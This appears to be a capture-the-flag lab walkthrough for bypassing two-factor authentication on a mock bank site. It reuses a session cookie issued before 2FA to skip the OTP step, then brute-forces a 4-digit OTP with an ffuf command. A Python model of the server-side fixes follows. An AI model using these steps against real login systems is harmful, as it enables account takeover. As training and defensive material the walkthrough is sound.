hackr.gg — Official Walkthrough
Confidential · Educational Use Only

FirstBank — 2FA Bypass

2FA Bypass · 2FA Authentication Bypass
Difficulty: Intermediate
Vuln class: 2FA Authentication Bypass
Steps: 3
// Objective
Bypass 2FA by skipping the OTP step (Flag 1) and brute-forcing the 4-digit OTP (Flag 2).
// Tools required
Browser, Burp Suite, ffuf
// Step-by-step walkthrough
1. Log in and capture the session cookie
Submit the login form with valid credentials. Intercept the response — you receive a session cookie even before completing 2FA.
Command / Input
POST /login {"username":"user","password":"password123"}
Output
Set-Cookie: session=abc123 (pre-2FA session)
2. Skip the OTP step (Flag 1)
Use the pre-2FA session cookie to request /api/me directly, never visiting the OTP screen. If the server never checks that the OTP step was completed, the request succeeds.
Command / Input
GET /api/me Cookie: session=abc123
Output
{"user":"alice","flag":"HackrGG{2f4_byp4ss_st3p_sk1pp3d}"}
The server grants access with an incomplete 2FA session — the step is enforced only in the UI.
3. Brute-force the admin OTP (Flag 2)
For the admin account, brute-force the 4-digit OTP (0000-9999). Use ffuf against the OTP endpoint.
Command / Input
ffuf -u http://TARGET/verify-otp -X POST -d '{"otp":"FUZZ"}' -w <(seq -w 0 9999) -mc 200
Output
HackrGG{2f4_0tp_bru73_f0rc3d}
OTP verification needs rate limiting and account lockout: a 4-digit code has only 10,000 possible values, so an unthrottled endpoint can be exhausted in minutes.
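As an added defender-side example (not part of the hackr.gg writeup or the FirstBank target), a minimal Python model of the two server-side fixes the steps above call for: /api/me must check a server-held "OTP completed" flag rather than merely that a session exists (step 2), and the OTP endpoint must count failures per account and lock out (step 3). All names (SESSIONS, login, api_me_vulnerable, api_me_hardened, verify_otp) and the lockout threshold are assumptions for illustration.

```python
import hmac
import secrets
from dataclasses import dataclass
from typing import Dict, Optional, Set

MAX_OTP_ATTEMPTS = 5  # lockout threshold: an assumed policy value, not stated in the writeup

@dataclass
class Session:
    user: str
    otp: str                   # 4-digit code issued for this login attempt
    mfa_verified: bool = False

SESSIONS: Dict[str, Session] = {}   # session id -> state
OTP_FAILURES: Dict[str, int] = {}   # per-account failure counter (survives re-login)
LOCKED_USERS: Set[str] = set()

def login(user: str) -> str:
    """Password step passed: issue a session that is NOT yet fully authenticated."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = Session(user=user, otp=f"{secrets.randbelow(10_000):04d}")
    return sid

def api_me_vulnerable(sid: str) -> Optional[dict]:
    """The writeup's bug (Flag 1): any existing session is treated as logged in."""
    s = SESSIONS.get(sid)
    return {"user": s.user} if s else None

def api_me_hardened(sid: str) -> Optional[dict]:
    """Fix: the OTP step must have been completed server-side, not just in the UI."""
    s = SESSIONS.get(sid)
    if s is None or not s.mfa_verified:
        return None
    return {"user": s.user}

def verify_otp(sid: str, otp: str) -> str:
    """Fix for Flag 2: count failures per account and lock after MAX_OTP_ATTEMPTS."""
    s = SESSIONS.get(sid)
    if s is None or s.user in LOCKED_USERS:
        return "denied"                     # no session, or account already locked
    if hmac.compare_digest(s.otp, otp):     # constant-time comparison
        s.mfa_verified = True
        return "ok"
    OTP_FAILURES[s.user] = OTP_FAILURES.get(s.user, 0) + 1
    if OTP_FAILURES[s.user] >= MAX_OTP_ATTEMPTS:
        LOCKED_USERS.add(s.user)            # the 10,000-code search space can no longer be walked
        return "denied"
    return "wrong"
```

Because the failure counter is keyed by account rather than by session, logging in again to obtain a fresh pre-2FA cookie does not reset it.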
// Flag
Flag value
HackrGG{2f4_byp4ss_st3p_sk1pp3d}
Flag 1 via OTP step skip; Flag 2 via brute-force.